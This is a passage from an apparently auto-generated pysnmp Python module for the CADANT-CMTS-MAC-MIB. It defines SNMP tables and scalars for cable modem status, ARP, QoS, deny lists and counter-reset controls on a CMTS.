cadSubMgtStbFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtStbFilterUpstream.setStatus('current')
cadTpFdbTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9), )
if mibBuilder.loadTexts: cadTpFdbTable.setStatus('current')
cadTpFdbEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadTpFdbAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadTpFdbIfIndex"))
if mibBuilder.loadTexts: cadTpFdbEntry.setStatus('current')
cadTpFdbAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadTpFdbAddress.setStatus('current')
cadTpFdbIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: cadTpFdbIfIndex.setStatus('current')
cadTpFdbStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 9, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("invalid", 2), ("learned", 3), ("self", 4), ("mgmt", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadTpFdbStatus.setStatus('current')
cadIfQosProfileLookupTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10), )
if mibBuilder.loadTexts: cadIfQosProfileLookupTable.setStatus('current')
cadIfQosProfileLookupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfPriority"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfMaxUpBandwidth"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfGuarUpBandwidth"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfMaxDownBandwidth"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfMaxTxBurst"), (0, "CADANT-CMTS-MAC-MIB", "cadIfQosProfBaselinePrivacy"))
if mibBuilder.loadTexts: cadIfQosProfileLookupEntry.setStatus('current')
cadIfQosProfileLookupIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfileLookupIndex.setStatus('current')
cadIfQosProfileLookupRefCount = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 10, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfileLookupRefCount.setStatus('current')
cadChannelToCmTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 11), )
if mibBuilder.loadTexts: cadChannelToCmTable.setStatus('current')
cadChannelToCmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 11, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIf3CmtsCmRegStatusMdIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"))
if mibBuilder.loadTexts: cadChannelToCmEntry.setStatus('current')
cadChannelToCmPtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 11, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadChannelToCmPtr.setStatus('current')
cadCmtsCmStatusSummaryTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12), )
if mibBuilder.loadTexts: cadCmtsCmStatusSummaryTable.setStatus('deprecated')
cadCmtsCmStatusSummaryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusDownChannelIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusUpChannelIfIndex"))
if mibBuilder.loadTexts: cadCmtsCmStatusSummaryEntry.setStatus('deprecated')
cadCmtsCmStatusNumOther = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumOther.setStatus('deprecated')
cadCmtsCmStatusNumRanging = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRanging.setStatus('deprecated')
cadCmtsCmStatusNumRangingAborted = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRangingAborted.setStatus('deprecated')
cadCmtsCmStatusNumRangingComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRangingComplete.setStatus('deprecated')
cadCmtsCmStatusNumIpComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumIpComplete.setStatus('deprecated')
cadCmtsCmStatusNumRegistrationComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegistrationComplete.setStatus('deprecated')
cadCmtsCmStatusNumAccessDenied = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumAccessDenied.setStatus('deprecated')
cadCmtsCmStatusNumRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRangFlaps.setStatus('deprecated')
cadCmtsCmStatusNumProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumProvFlaps.setStatus('deprecated')
cadCmtsCmStatusNumRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegFlaps.setStatus('deprecated')
cadCmtsCmStatusNumOperational = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumOperational.setStatus('deprecated')
cadCmtsCmStatusNumRegisteredBpiInitializing = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegisteredBpiInitializing.setStatus('deprecated')
cadCmtsCmStatusNumTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumTotal.setStatus('deprecated')
cadCmtsCmStatusNumActive = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumActive.setStatus('deprecated')
cadCmtsCmStatusNumRegistered = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 12, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusNumRegistered.setStatus('deprecated')
cadArpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13), )
if mibBuilder.loadTexts: cadArpTable.setStatus('current')
cadArpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadArpIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadArpAddressType"), (0, "CADANT-CMTS-MAC-MIB", "cadArpNetAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadArpL3IfIndex"))
if mibBuilder.loadTexts: cadArpEntry.setStatus('current')
cadArpIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: cadArpIfIndex.setStatus('current')
cadArpAddressType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 2), InetAddressType())
if mibBuilder.loadTexts: cadArpAddressType.setStatus('current')
cadArpNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 3), InetAddressIPv4or6())
if mibBuilder.loadTexts: cadArpNetAddress.setStatus('current')
cadArpMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 4), MacAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadArpMacAddress.setStatus('current')
cadArpType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("invalid", 2), ("dynamic", 3), ("static", 4), ("local", 5))).clone('static')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadArpType.setStatus('current')
cadArpState = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("reachable", 1), ("stale", 2), ("delay", 3), ("probe", 4), ("invalid", 5), ("unknown", 6), ("incomplete", 7))).clone('unknown')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadArpState.setStatus('current')
cadArpL3IfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 13, 1, 7), InterfaceIndexOrZero())
if mibBuilder.loadTexts: cadArpL3IfIndex.setStatus('current')
cadMacControl = MibIdentifier((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14))
cadMacClearFlapCounts = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 1), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearFlapCounts.setStatus('current')
cadMacResetCMMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 2), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacResetCMMacAddress.setStatus('current')
cadMacDeleteMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 3), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacDeleteMacAddress.setStatus('current')
cadMacClearDenyCounts = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 4), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearDenyCounts.setStatus('current')
cadMacClearDenyCountMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 5), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearDenyCountMacAddr.setStatus('current')
cadMacClearFlapCountMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 6), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearFlapCountMacAddr.setStatus('current')
cadMacRecalculateCmSummaryIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 7), InterfaceIndexOrZero()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacRecalculateCmSummaryIfIndex.setStatus('current')
cadMacClearFlapCountsByIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 8), InterfaceIndexOrZero()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearFlapCountsByIfIndex.setStatus('current')
cadMacClearPenaltyCounts = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 9), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCounts.setStatus('current')
cadMacClearPenaltyCountsByIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 10), InterfaceIndexOrZero()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCountsByIfIndex.setStatus('current')
cadMacClearPenaltyCountMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 11), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCountMacAddr.setStatus('current')
cadMacClearPenaltyCountScn = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 14, 12), SnmpAdminString().clone(' ')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadMacClearPenaltyCountScn.setStatus('current')
cadQosCmtsMacToSrvFlowTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15), )
if mibBuilder.loadTexts: cadQosCmtsMacToSrvFlowTable.setStatus('current')
cadQosCmtsMacToSrvFlowEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadQosCmtsCmMac"), (0, "CADANT-CMTS-MAC-MIB", "cadQosCmtsServiceFlowId"))
if mibBuilder.loadTexts: cadQosCmtsMacToSrvFlowEntry.setStatus('current')
cadQosCmtsCmMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadQosCmtsCmMac.setStatus('current')
cadQosCmtsServiceFlowId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosCmtsServiceFlowId.setStatus('current')
cadQosCmtsIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 15, 1, 3), InterfaceIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosCmtsIfIndex.setStatus('current')
cadQosServiceClassTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19), )
if mibBuilder.loadTexts: cadQosServiceClassTable.setStatus('current')
cadQosServiceClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19, 1), )
docsQosServiceClassEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadQosServiceClassEntry"))
cadQosServiceClassEntry.setIndexNames(*docsQosServiceClassEntry.getIndexNames())
if mibBuilder.loadTexts: cadQosServiceClassEntry.setStatus('current')
cadQosServiceClassPeakTrafficRate = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19, 1, 1), BitRate()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadQosServiceClassPeakTrafficRate.setStatus('current')
cadQosServiceClassLatencyControlledFlowFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 19, 1, 2), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadQosServiceClassLatencyControlledFlowFlag.setStatus('current')
cadCmtsCmVendorTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20), )
if mibBuilder.loadTexts: cadCmtsCmVendorTable.setStatus('current')
cadCmtsCmVendorEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCmtsCmVendorOUI"))
if mibBuilder.loadTexts: cadCmtsCmVendorEntry.setStatus('current')
cadCmtsCmVendorOUI = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1, 1), OUIAddress())
if mibBuilder.loadTexts: cadCmtsCmVendorOUI.setStatus('current')
cadCmtsCmVendorName = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 46)).clone('(unspecified)')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCmtsCmVendorName.setStatus('current')
cadCmtsCmVendorRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCmtsCmVendorRowStatus.setStatus('current')
cadIfCmtsMacToIpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21), )
if mibBuilder.loadTexts: cadIfCmtsMacToIpTable.setStatus('current')
cadIfCmtsMacToIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacAddr"))
if mibBuilder.loadTexts: cadIfCmtsMacToIpEntry.setStatus('current')
cadIfCmtsMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsMacAddr.setStatus('current')
cadIfCmtsMacCmMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacCmMacAddr.setStatus('current')
cadIfCmtsMacInetIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 4), InetAddressIPv4or6().clone(hexValue="00000000")).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacInetIpAddr.setStatus('deprecated')
cadIfCmtsMacInetIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 5), InetAddressType().clone('ipv4')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacInetIpAddrType.setStatus('deprecated')
cadCmDenyTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22), )
if mibBuilder.loadTexts: cadCmDenyTable.setStatus('current')
cadCmDenyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCmDenyMacAddress"))
if mibBuilder.loadTexts: cadCmDenyEntry.setStatus('current')
cadCmDenyMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadCmDenyMacAddress.setStatus('current')
cadCmDenyRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCmDenyRowStatus.setStatus('current')
cadCmDenyStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23), )
if mibBuilder.loadTexts: cadCmDenyStatusTable.setStatus('current')
cadCmDenyStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCmDenyMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadCmDenyRecentIfIndex"))
if mibBuilder.loadTexts: cadCmDenyStatusEntry.setStatus('current')
cadCmDenyRecentIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: cadCmDenyRecentIfIndex.setStatus('current')
cadCmDenyRecentTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1, 2), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmDenyRecentTime.setStatus('current')
cadCmDenyAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmDenyAttempts.setStatus('current')
cadCpeHostAuthorizationTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24), )
if mibBuilder.loadTexts: cadCpeHostAuthorizationTable.setStatus('current')
cadCpeHostAuthorizationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCpeHostAuthCmMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadCpeHostAuthCpeMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadCpeHostAuthCpeIpAddress"))
if mibBuilder.loadTexts: cadCpeHostAuthorizationEntry.setStatus('current')
cadCpeHostAuthCmMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadCpeHostAuthCmMacAddress.setStatus('current')
cadCpeHostAuthCpeMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 2), MacAddress())
if mibBuilder.loadTexts: cadCpeHostAuthCpeMacAddress.setStatus('current')
cadCpeHostAuthCpeIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 3), IpAddress())
if mibBuilder.loadTexts: cadCpeHostAuthCpeIpAddress.setStatus('current')
cadCpeHostAuthRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCpeHostAuthRowStatus.setStatus('current')
cadIfCmtsInetIpToCmMacTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25), )
if mibBuilder.loadTexts: cadIfCmtsInetIpToCmMacTable.setStatus('current')
cadIfCmtsInetIpToCmMacEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsInetIpMacAddrType"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsInetIpMac"))
if mibBuilder.loadTexts: cadIfCmtsInetIpToCmMacEntry.setStatus('current')
cadIfCmtsInetIpMacAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 1), InetAddressType())
if mibBuilder.loadTexts: cadIfCmtsInetIpMacAddrType.setStatus('current')
cadIfCmtsInetIpMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 2), InetAddressIPv4or6())
if mibBuilder.loadTexts: cadIfCmtsInetIpMac.setStatus('current')
cadIfCmtsInetIpCmMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsInetIpCmMac.setStatus('current')
cadIfCmtsInetIpCpeMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 4), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsInetIpCpeMac.setStatus('current')
cadCmtsCmStatusMacSummaryTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26), )
if mibBuilder.loadTexts: cadCmtsCmStatusMacSummaryTable.setStatus('deprecated')
cadCmtsCmStatusMacSummaryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1), ).setIndexNames((0, "CADANT-CMTS-LAYER2CMTS-MIB", "cadIfMacDomainIfIndex"))
if mibBuilder.loadTexts: cadCmtsCmStatusMacSummaryEntry.setStatus('deprecated')
cadCmtsCmStatusMacNumOther = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumOther.setStatus('deprecated')
cadCmtsCmStatusMacNumInitRanging = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumInitRanging.setStatus('deprecated')
cadCmtsCmStatusMacNumRangingComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRangingComplete.setStatus('deprecated')
cadCmtsCmStatusMacNumStartEae = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartEae.setStatus('deprecated')
cadCmtsCmStatusMacNumStartDhcpv4 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartDhcpv4.setStatus('deprecated')
cadCmtsCmStatusMacNumStartDhcpv6 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartDhcpv6.setStatus('deprecated')
cadCmtsCmStatusMacNumDhcpv4Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumDhcpv4Complete.setStatus('deprecated')
cadCmtsCmStatusMacNumDhcpv6Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumDhcpv6Complete.setStatus('deprecated')
cadCmtsCmStatusMacNumStartCfgFileDownload = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartCfgFileDownload.setStatus('deprecated')
cadCmtsCmStatusMacNumCfgFileDownloadComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumCfgFileDownloadComplete.setStatus('deprecated')
cadCmtsCmStatusMacNumStartRegistration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartRegistration.setStatus('deprecated')
cadCmtsCmStatusMacNumRegistrationComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRegistrationComplete.setStatus('deprecated')
cadCmtsCmStatusMacNumOperational = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumOperational.setStatus('deprecated')
cadCmtsCmStatusMacNumBpiInit = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumBpiInit.setStatus('deprecated')
cadCmtsCmStatusMacNumForwardingDisabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumForwardingDisabled.setStatus('deprecated')
cadCmtsCmStatusMacNumRfMuteAll = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRfMuteAll.setStatus('deprecated')
